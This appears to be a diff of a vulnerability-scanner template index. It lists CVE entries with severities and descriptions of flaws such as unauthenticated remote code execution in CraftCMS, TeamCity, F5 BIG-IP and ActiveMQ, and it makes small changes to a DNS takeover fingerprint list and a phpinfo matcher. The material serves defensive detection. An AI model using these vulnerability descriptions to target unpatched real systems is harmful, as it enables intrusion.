{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"} {"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
@ -2207,11 +2220,13 @@
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"}
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"critical","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
@ -2222,7 +2237,9 @@
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"}
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
@ -2236,8 +2253,7 @@
{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. 
It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"} {"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. 
It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"}
{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"} {"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"}
{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"} {"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"}
{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} {"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"}
{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"}
{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"}
{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"}
{"ID":"CVE-2023-46604","Info":{"Name":"Apache ActiveMQ - Remote Code Execution","Severity":"critical","Description":"Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\nUsers are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2023/CVE-2023-46604.yaml"}


@ -1 +1 @@
db8c3c3eb9d43b2fcd262a91dc910e0f 966878414639a1d70cbb937632710839


@ -55,6 +55,7 @@ dns:
- "servicebus.windows.net" - "servicebus.windows.net"
- "visualstudio.com" - "visualstudio.com"
- "-msedge.net" - "-msedge.net"
- "msappproxy.net"
- "trafficmanager.net" - "trafficmanager.net"
- type: word - type: word
@ -433,5 +434,4 @@ dns:
regex: regex:
- "IN\tCNAME\\t(.+)$" - "IN\tCNAME\\t(.+)$"
- "IN\\s*CNAME\\t(.+)$" - "IN\\s*CNAME\\t(.+)$"
# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950


@ -22,15 +22,12 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
part: body part: body
words: words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors"
- "display_errors"
condition: and
